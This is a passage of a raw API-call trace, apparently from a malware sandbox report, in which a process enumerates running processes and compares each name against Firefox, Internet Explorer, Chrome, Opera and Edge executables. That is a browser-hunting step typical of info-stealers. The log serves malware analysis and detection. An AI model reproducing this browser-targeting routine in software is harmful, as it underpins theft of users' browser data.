th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.101] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.102] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0238.102] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0238.102] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0238.102] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0238.102] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.102] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.102] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0238.102] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0238.102] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0238.102] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0238.102] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.102] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.103] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0238.103] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0238.103] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0238.103] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0238.103] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.103] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.103] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.103] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.103] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.104] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.104] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.104] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0238.104] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0238.104] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0238.104] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0238.104] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0238.105] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0238.105] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0238.105] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0238.105] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0238.105] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.105] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0238.105] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0238.105] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0238.105] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0238.105] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0238.105] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.105] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0238.106] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0238.106] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0238.106] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0238.106] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0238.106] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.106] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0238.106] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0238.106] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0238.106] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0238.106] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0238.106] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.107] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0238.107] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0238.107] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0238.107] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0238.107] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0238.107] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.107] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0238.108] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0238.108] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0238.108] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0238.108] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0238.108] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0238.108] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0238.108] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0238.108] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0238.108] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0238.108] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0238.109] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0238.109] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0238.109] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0238.109] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0238.109] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.109] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0238.109] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0238.109] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0238.109] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0238.109] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0238.109] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.109] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0238.110] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0238.110] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0238.110] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0238.110] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0238.110] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.110] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0238.110] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0238.111] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0238.111] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0238.111] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0238.111] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0238.111] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0238.111] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0238.111] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0238.111] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0238.111] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0238.112] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0238.112] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0238.112] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0238.112] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0238.112] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0238.112] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0238.112] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0238.112] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0238.112] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0238.112] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0238.113] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0238.113] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0238.113] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0238.113] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0238.113] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0238.114] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0238.114] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0238.114] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0238.114] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0238.114] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0238.114] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0238.114] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0238.114] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0238.114] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0238.114] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0238.115] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0238.115] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0238.115] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0238.115] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0238.115] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0238.115] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0238.115] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0238.115] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0238.115] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0238.115] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0238.116] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0238.116] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0238.116] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0238.116] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0238.116] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0238.116] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0238.116] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0238.116] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0238.117] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0238.117] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0238.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0238.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0238.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0238.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.118] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.118] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.118] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.118] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.118] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.118] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0238.118] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0238.118] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0238.118] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0238.118] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.119] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.119] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.119] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.119] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.119] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0238.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0238.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0238.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0238.119] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.120] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0238.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.121] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0238.121] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0238.121] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0238.121] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0238.121] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.121] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0238.121] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0238.121] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0238.121] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0238.121] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.122] lstrcmpiA 